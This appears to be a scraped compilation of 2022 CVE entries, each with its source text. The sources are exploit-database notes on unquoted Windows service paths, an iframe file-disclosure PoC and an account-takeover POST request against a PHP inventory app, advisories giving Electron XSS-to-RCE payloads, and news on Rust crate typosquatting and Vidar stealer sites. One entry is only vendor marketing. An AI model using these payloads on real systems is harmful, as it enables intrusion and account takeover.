BattlEye v0.9 contains an unquoted service path which allows attackers to escalate privileges to the system level.

    # Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path
    # Date: 09/03/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.battleye.com/
    # Software Link: https://www.battleye.com/downloads/
    # Version: 0.94
    # Tested: Windows 10 Pro 
    # Contact: https://twitter.com/dmaral3noz
    
    
    C:\Users\saudh>sc qc BEService
    
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: BEService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 3   DEMAND_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : BattlEye Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    #Exploit:
    
    A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

CVE-2022-27095: Offensive Security’s Exploit Database Archive

Private Internet Access v3.3 contains an unquoted service path which allows attackers to escalate privileges to the system level.

    # Exploit Title: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path
    # Date: 04/03/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.privateinternetaccess.com
    # Software Link: https://www.privateinternetaccess.com/download
    # Version: 3.3.0.100
    # Tested: Windows 10 x64
    # Contact: https://twitter.com/dmaral3noz
    
    # Step to discover Unquoted Service Path:
    
    C:\Users\saudh>wmic service where 'name like "%PrivateInternetAccessService%"' get name, displayname, pathname, startmode, startname
    
    DisplayName                      Name                          PathName                                                    StartMode  StartName
    Private Internet Access Service  PrivateInternetAccessService  "C:\Program Files\Private Internet Access\pia-service.exe"  Auto       LocalSystem
    
    # Service info:
    
    C:\Users\saudh>sc qc PrivateInternetAccessService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: PrivateInternetAccessService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files\Private Internet Access\pia-service.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Private Internet Access Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    
    #Exploit:
    
    A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

CVE-2022-27092: Offensive Security’s Exploit Database Archive

Sony PlayMemories Home v6.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.

    # Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path
    # Date: 09/03/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sony.com/
    # Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html
    # Version: 6.0
    # Tested: Windows 10 Pro 
    # Contact: https://twitter.com/dmaral3noz
    
    
    C:\Users\saudh>sc qc PMBDeviceInfoProvider
    
    [SC] QueryServiceConfig SUCCESS
    
    
    SERVICE_NAME: PMBDeviceInfoProvider
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : PMBDeviceInfoProvider
            DEPENDENCIES       : RPCSS
            SERVICE_START_NAME : LocalSystem
    
    
    
    #Exploit:
    
    A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

CVE-2022-27094: Offensive Security’s Exploit Database Archive

Multi Store Inventory Management System v1.0 was discovered to contain an information disclosure vulnerability which allows attackers to access sensitive files.

    # Exploit Title: Multi Store Inventory Management System - Information Disclosure# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.bdtask.com/# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/# Version: 1.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3noz# Description :The application allows directory listing and information disclosure ofsome sensitive files that can allow an attacker to leverage the disclosedinformation.################################################PoC Html :<html><head><body><title>Multi Store Inventory Management System - Information Disclosure</title><iframesrc=http://127.0.0.1/multistore_demo/install/sql/install.sql></body></head><html>

CVE-2022-28991: Multi Store Inventory Management System 1.0 Information Disclosure ≈ Packet Storm

Multi Store Inventory Management System v1.0 allows attackers to perform an account takeover via a crafted POST request.

    # Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.bdtask.com/# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/# Version: 1.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3noz# Description :An attacker can takeover any registered 'Staff' user account by just sending below POST requestBy changing the the "id", "email", "password" , "firstname" and "lastname" parameters#Steps to Reproduce :1. Send the below POST request by changing "id", "email", "password" parameters.2. Log in to the user account by changed email and password.################################################POST /multistore_demo/dashboard/home/setting HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687Content-Length: 1645Origin: http://localhostConnection: closeReferer: http://localhost/multistore_demo/dashboard/home/settingCookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405Upgrade-Insecure-Requests: 1-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="id"1-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="firstname"saud-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="lastname"test-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="email"s3od@hi.com-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="password"admin123-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="about"-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="old_image"-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="image"; filename=""Content-Type: application/octet-stream-----------------------------246162487211952414471071914687--

CVE-2022-28993: Multi Store Inventory Management System 1.0 Account Takeover ≈ Packet Storm

In certain Goverlan products, the Windows Firewall is temporarily turned off upon a Goverlan agent update operation. This allows remote attackers to bypass firewall blocking rules for a time period of up to 30 seconds. This affects Goverlan Reach Console before 10.5.1, Reach Server before 3.70.1, and Reach Client Agents before 10.1.11.

EasyVista Acquires Goverlan to Expand Product Capabilities Toward Self-Healing

**Discover Goverlan Reach**

with this 3 minute video

**Alleviate your help desk pain points with remote help desk software****Learn how Goverlan Reach  
can improve Software Deployment**

**Goverlan Reach is used for**  

**Goverlan Reach remote IT support software solves your help desk pain points by increasing ticket close rates and overall help desk productivity.**

**Goverlan Reach remote admin software works behind the scenes to instantaneously:**

*   Reset a password
*   Unlock an account
*   Install a driver or device
*   Add a printer
*   Map a drive
*   Install, repair a software
*   Run & end a process
*   Monitor performance

**For your more complicated cases, you can remote control:**

*   Quickly connecting to user sessions with fastConnect
*   Inviting other operators to join a session and collaborate on resolution
*   Learn more

**Manage your desktop users and IT infrastructure remotely and securely. Automate your repetitive system administration tasks.**

**Save time and improve efficiency with:**

*   Global configuration management
*   Real-time monitoring, reporting and process automation
*   Software deployment, patch management and Windows updates
*   Password Management
*   Remote control, SSH and Telnet access
*   Secure access of desktops, servers, switches, and firewalls
*   Active Directory administration and automation
*   Bulk actions performed in 1 click
*   Hardware & Software inventories
*   User’s activities monitoring
*   Learn more

**Manage the complexity of your IT landscape with a scalable remote access software that works both for SMBs and enterprise businesses.**

**Goverlan Reach offers the following benefits:**

*   Lower cost of supporting IT infrastructure
*   Auditing of technician actions
*   Increased ticket close rates and overall technician productivity
*   Support local and remote end-users and systems
*   Increased compliance and security management
*   Perform almost any Windows administration tasks remotely
*   Compliance evaluation & remediation
*   A solution to manage attended and unattended endpoints
*   Affordable enterprise-class Remote Control
*   Learn more

**Improve efficiency of your remote IT support and administration operations. Support stand-alone users, workgroups, and entire Active Directory sites with enterprise-class remote access software.**

**Goverlan Reach offers the following benefits:**

*   Enterprise-class remote management and administration
*   Entire sites and individual endpoints management without VPN
*   On-demand support options for anyone, anywhere
*   Increased ticket close rate and overall technician productivity
*   Scalable pricing
*   Small footprint, easy integration
*   Auditing of technician actions
*   Learn more

**Manage your ATM, POS, and Digital Signage Systems with smarter remote support tools.**

**Goverlan Reach provides:**

*   Remediates DSS fails without exposing the system’s desktop to the public view
*   Enables users to perform visual verifications on multiple screens at once
*   Allows console operators to schedule health measures to prevent future DSS fails
*   Audits systems, detects undesired activities and sends alerts
*   Provides background systems management tools to minimize disruption
*   Generates hardware & software inventories
*   Offers advanced Remote Control features
*   Is secure and Compliant
*   Learn more

**Why Goverlan Reach?****Empowering the global IT environment since 1998. Trusted by 13,000  
customers and managing more than 3 million devices.**

**TRUSTED**

ACROSS EVERY INDUSTRY

**ENSURE SECURITY**

Secure your organization and clients with an on-premises enterprise-class solution, on-premises credential manager, and centralized auditing.

**TAKE CONTROL**

Get instant access to attended and unattended machines, no matter where they are. Features like on-demand remote access, shadowing Citrix and Terminal Services sessions, and performance monitoring help keep you on top of your IT environment.

**DELIVER UNPARALLELED SUPPORT**

A range of powerful remote admin software tools will help you manage remote users in the most secure environment. Multiple connection options allow you to support users regardless of their network location and quickly resolve their issues.

**Secure****Be in total control**

On-premises implementation  
(no external surface of attack)

Enterprise-class authentication

Internal password vault

Centralized controls of client configuration and operator actions

Centralized auditing of operator actions

**Powerful****All the features you need**

Quickly target the problem,  
efficiently resolve issues

Easy-to-use, robust features

Endpoint management  
anywhere in the world

Zero-delay management engine

Install in minutes

**Scalable****Designed for all organization  
types, levels, and sizes**

Subscription based licenses  
/ Pay as you grow

No additional fee  
for internal end points

Minimal infrastructure  
hardware requirements

**IT professionals  Goverlan®**

> Goverlan, unlike other solutions, offers real-time data. I can be remotely viewing a user's desktop before they are finished explaining the problem.

> With Goverlan we've increased our first-call resolution by 95%. In many cases we can also perform tasks in the background with minimal or no interruption to the user.
> 
> Kingdon Capital

> The intuitive layout and design of the GUI makes learning Goverlan a simple task. We were 100% operational the same day we downloaded the trial installation. The only way it would have been easier is if someone was clicking “NEXT” for me.
> 
> Asbury Automotive Group

> The most significant cost savings with Goverlan have been with travel avoidance and staff time. We're now able to remotely administer actions quicker and more efficiently and perform mass software updates with the simple click of a mouse or scheduled job in Goverlan.
> 
> State of South Dakota, BIT

> Using Goverlan, we can troubleshoot at a fraction of the time – and the cost – everything from fixing printer issues right on the task manager, ... to pushing out OS rollouts countrywide, all right from one office.
> 
> Córas Iompair Éireann

> The product is intuitive and just works… Though we rarely have had to contact support, when we have, we have had prompt response and resolution.
> 
> Teltech Communications

See all

Goverlan Reviews on  

Goverlan Reach

Review by User Les L

Found this at a conference and it's been a FANTASTIC tool

Ease of use and completeness of functionality. Love the Reach server. With the Coronavirus changes in people working from home, this gave us the ability to support personal computers.. more

Review by Hunter M

Great Product for HelpDesk!

The easy of patching, running programs, and the integration with multiple ticketing systems more

Review by Jack T

Efficient Computer Management

I like having all the controls I need in one place - and for the integration with Active Directory, it is a lot faster to use Goverlan than using Active Directory directly more

Review by Wade M

GoverLAN Reach

GoverLAN is a great tool I use almost everyday at the office. It provides both an in-depth look at our network and automation tools that allow us to streamline routine IT processes. Their technical support team is fantastic as well more

Review by Derrick E

Great Low Cost Solution for Small, Medium or Large Organization

Love the fact the licensing is not based on end devices, instead on number of technicians using the product. Make for a low cost solution for anyone. Great features and they are always willing try to expand and grow the product. more

CVE-2022-31215: Remote Support Software for Desktop Support & Systems Management

Thinfinity VNC v4.0.0.1 contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can trick a user into browse malicious site, to obtain an 'ID' that can be used to send websocket requests and achieve RCE.

**Summary**

**Name**

Proton v0.2.0 - XSS To RCE

**Code name**

Lennon

**Product**

Proton Markdown

**Affected versions**

Version 0.2.0

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

XSS to RCE

**Rule**

010\. Stored cross-site scripting (XSS)

**Remote**

No

**CVSSv3 Vector**

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

**CVSSv3 Base Score**

7.1

**Exploit available**

No

**CVE ID(s)**

CVE-2022-25224

**Description**

Proton **v0.2.1** allows an attacker to create a malicious link inside a markdown file. When the victim clicks the link, the application opens the site in the current frame allowing an attacker to host JavaScript code in the malicious link in order to trigger an XSS attack. The nodeIntegration configuration is set to **on** which allows the webpage to use NodeJs features, an attacker can leverage this to run OS commands.

**Proof of Concept****Steps to reproduce**

1.  Create a markdown file with the following content.
    
        [Click me!!!](http://192.168.1.67:8002/rce.html)
        
    
2.  Host the rce.html file with the following content on a server controlled by the attacker.
    
         <script>
             require('child_process').exec('calc');
         </script>
        
    
3.  Send the markdown file to the victim. When the victim clicks the markdown link the site will be open inside electron and the JavaScript code will spawn a calculator.
    

**System Information**

*   Version: Proton v0.2.1.
*   Operating System: Windows 10.0.19042 N/A Build 19042.
*   Installer: Proton.Setup.0.2.0.exe

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

By 2022-05-17 there is not a patch resolving the issue.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://github.com/steventhanna/proton/

**Timeline**

2022-04-29

Vulnerability discovered.

2022-04-29

Vendor contacted.

2022-05-17

Public Disclosure.

CVE-2022-25227: Proton v0.2.0 - XSS To RCE | Fluid Attacks

Popcorn Time 0.4.7 has a Stored XSS in the 'Movies API Server(s)'' field via the 'settings' page. The 'nodeIntegration' configuration is set to on which allows the webpage to use 'NodeJs' features, an attacker can leverage this to run OS commands.

1.  Home
2.  Advisories
3.  Popcorn Time 0.4.7 XSS to RCE

**Summary**

**Name**

Popcorn Time 0.4.7 - XSS to RCE

**Code name**

Bowie

**Product**

Popcorn Time

**Affected versions**

Version 0.4.7 (Just Keep Swimming)

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

XSS to RCE

**Rule**

010\. Stored cross-site scripting (XSS)

**Remote**

No

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N

**CVSSv3 Base Score**

7.7

**Exploit available**

No

**CVE ID(s)**

CVE-2022-25229

**Description**

Popcorn Time 0.4.7 has a Stored XSS in the Movies API Server(s) field via the settings page. The nodeIntegration configuration is set to **on** which allows the webpage to use NodeJs features, an attacker can leverage this to run OS commands.

**Proof of Concept****Steps to reproduce**

1.  Open the Popcorn time application.
    
2.  Go to settings.
    
3.  Enable Show advanced settings.
    
4.  Scroll down to the API Server(s) section.
    
5.  Insert the following PoC inside the Movies API Server(s) field and click on Check for updates.
    

    a"><script>require('child_process').exec('calc');</script>
    

6.  Scroll down to the Database section and click on Export database.
    
7.  The application will create a .zip file with the current configuration.
    
8.  Send the configuration to the victim.
    
9.  The victim must go to Settings -> Database and click on Import Database
    
10.  When the victim restarts the application the XSS will be triggered and will run the calc command.
    

**System Information**

*   Version: Popcorn Time 0.4.7.
*   Operating System: Windows 10.0.19042 N/A Build 19042.
*   Installer: Popcorn-Time-0.4.7-win64-Setup.exe

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

An updated version of PopcornTime is available at the vendor page.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://github.com/popcorn-official/popcorn-desktop

**Issue** https://github.com/popcorn-official/popcorn-desktop/issues/2491

**Timeline**

2022-04-26

Vulnerability discovered.

2022-04-26

Vendor contacted.

2022-05-04

Vendor Confirmed the vulnerability.

2022-05-07

Vulnerability patched.

2022-05-17

Public Disclosure.

CVE-2022-25229: Popcorn Time 0.4.7 - XSS to RCE | Fluid Attacks

A case of software supply chain attack has been observed in the Rust programming language's crate registry that leveraged typosquatting techniques to publish a rogue library containing malware.
Cybersecurity firm SentinelOne dubbed the attack "CrateDepression."
Typosquatting attacks take place when an adversary mimics the name of a popular package on a public registry in hopes that developers

A case of software supply chain attack has been observed in the Rust programming language's crate registry that leveraged typosquatting techniques to publish a rogue library containing malware.

Cybersecurity firm SentinelOne dubbed the attack "CrateDepression."

Typosquatting attacks take place when an adversary mimics the name of a popular package on a public registry in hopes that developers will accidentally download the malicious package instead of the legitimate library.

In this case, the crate in question is "rustdecimal," a typosquat of the real "rust\_decimal" package that's been downloaded over 3.5 million times to date. The package was flagged earlier this month on May 3 by Askar Safin, a Moscow-based developer.

According to an advisory published by the Rust maintainers, the crate is said to have been first pushed on March 25, 2022, attracting fewer than 500 downloads before it was permanently removed from the repository.

Like prior typosquatting attacks of this kind, the misspelled library replicates the entire functionality of the original library while also introducing a malicious function that's designed to retrieve a Golang binary hosted on a remote URL.

Specifically, the new function checks if the "GITLAB\_CI" environment variable is set, suggesting a "singular interest in GitLab continuous integration (CI) pipelines," SentinelOne noted.

The payload, which is equipped to capture screenshots, log keystrokes, and download arbitrary files, is capable of running on both Linux and macOS, but not Windows systems. The ultimate goals of the campaign are unknown as yet.

While typosquatting attacks have been previously documented against NPM (JavaScript), PyPi (Python), and RubyGems (Ruby), the development marks an uncommon instance where such an incident has been discovered in the Rust ecosystem.

"Software supply-chain attacks have gone from a rare occurrence to a highly desirable approach for attackers to 'fish with dynamite' in an attempt to infect entire user populations at once," SentinelOne researchers said.

"In the case of CrateDepression, the targeting interest in cloud software build environments suggests that the attackers could attempt to leverage these infections for larger scale supply-chain attacks."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Rust Supply-Chain Attack Targeting Cloud CI Pipelines

Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware.
"The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware

Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware.

"The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware fetch the C2 configuration from attacker-controlled social media channels hosted on Telegram and Mastodon network."

Some of the rogue distribution vector domains, which were registered last month on April 20, consist of ms-win11\[.\]com, win11-serv\[.\]com, and win11install\[.\]com, and ms-teams-app\[.\]net.

In addition, the cybersecurity firm cautioned that the threat actor behind the impersonation campaign is also leveraging backdoored versions of Adobe Photoshop and other legitimate software such as Microsoft Teams to deliver Vidar malware.

The ISO file, for its part, contains an executable that's unusually large in size (over 300MB) in an attempt to evade detection by security solutions and is signed with an expired certificate from Avast that was likely stolen following the latter's breach in October 2019.

But embedded within the 330MB binary is a 3.3MB-sized executable that's the Vidar malware, with the rest of the file content padded with 0x10 bytes to artificially inflate the size.

In the next phase of the attack chain, Vidar establishes connections to a remote command-and-control (C2) server to retrieve legitimate DLL files such as sqlite3.dll and vcruntime140.dll to siphon valuable data from compromised systems.

Also notable is the abuse of Mastodon and Telegram by the threat actor to store the C2 IP address in the description field of the attacker-controlled accounts and communities.

The findings add to a list of different methods that have been uncovered in the past month to distribute the Vidar malware, including Microsoft Compiled HTML Help (CHM) files and a loader called Colibri.

"The threat actors distributing Vidar malware have demonstrated their ability to social engineer victims into installing Vidar stealer using themes related to the latest popular software applications," the researchers said.

"As always, users should be cautious when downloading software applications from the Internet and download software only from the official vendor websites."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows